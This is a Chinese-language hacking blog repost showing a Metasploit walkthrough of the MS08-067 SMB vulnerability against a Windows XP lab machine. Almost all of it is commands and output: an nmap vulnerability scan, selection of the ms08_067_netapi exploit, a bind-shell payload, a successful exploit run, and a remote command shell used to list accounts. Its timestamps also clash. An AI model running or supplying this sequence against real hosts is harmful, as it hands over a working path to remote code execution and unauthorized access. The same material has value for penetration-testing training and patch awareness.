记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

ms08-067漏洞 远程溢出入侵测试

2017-02-03 06:10

被攻击者IP地址:192.168.9.4,操作系统Windows XP sp3 English

攻击者IP地址:192.168.9.1

 

//查看数据库连接状态

msf > db_status
[*] postgresql connected to msf3

//使用nmap扫描目标机器
msf > db_nmap -sS -sV -O –script=smb-check-vulns.nse -n 192.168.9.4
[*] Nmap: Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2016-08-7 23:01
[*] Nmap: Nmap scan report for 192.168.9.4
[*] Nmap: Host is up (0.00s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE      VERSION
[*] Nmap: 135/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp open  netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:43:D6:5F (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP|2003
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: VULNERABLE
[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |   regsvc DoS: CHECK DISABLED (add ‘–script-args=unsafe=1’ to run)
[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add ‘–script-args=unsafe=1’ to run)
[*] Nmap: |   MS06-025: CHECK DISABLED (remove ‘safe=1’ argument to run)
[*] Nmap: |_  MS07-029: CHECK DISABLED (remove ‘safe=1’ argument to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results athttp://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds

//查找ms08_067漏洞

msf > search ms08_067

Matching Modules
================

Name                                 Disclosure Date          Rank   Description
—-                                 —————          —-   ———–
exploit/windows/smb/ms08_067_netapi  2008-10-28 00:00:00 UTC  great  Microsoft Server Service Relative Path Stack Corruption

//使用MS08_067漏洞
msf > use exploit/windows/smb/ms08_067_netapi

//设置远程地址,正向连接
msf  exploit(ms08_067_netapi) > set RHOST 192.168.9.4
RHOST => 192.168.9.4

//设置ShellCode
msf  exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp

//显示配置的选项
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name     Current Setting  Required  Description
—-     —————  ——–  ———–
RHOST    192.168.9.4      yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):

Name      Current Setting  Required  Description
—-      —————  ——–  ———–
EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
LPORT     4444             yes       The listen port
RHOST     192.168.9.4      no        The target address
Exploit target:

Id  Name
—  —-
0   Automatic Targeting

//expliot
msf  exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Command shell session 1 opened (192.168.9.1:1126 -> 192.168.9.4:4444) at 2012-09-25 11:04:31 +0800

成功返回Shell

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\

——————————————————————————-
Administrator            Guest                    hacker
HelpAssistant            SUPPORT_388945a0
The command completed with one or more errors.

知识来源: www.0-sec.org/2017/02/02/ms08-067%e6%bc%8f%e6%b4%9e-%e8%bf%9c%e7%a8%8b%e6%ba%a2%e5%87%ba%e5%85%a5%e4%be%b5%e6%b5%8b%e8%af%95/

阅读:128001 | 评论:0 | 标签:安全文章 溢出 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“ms08-067漏洞 远程溢出入侵测试”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云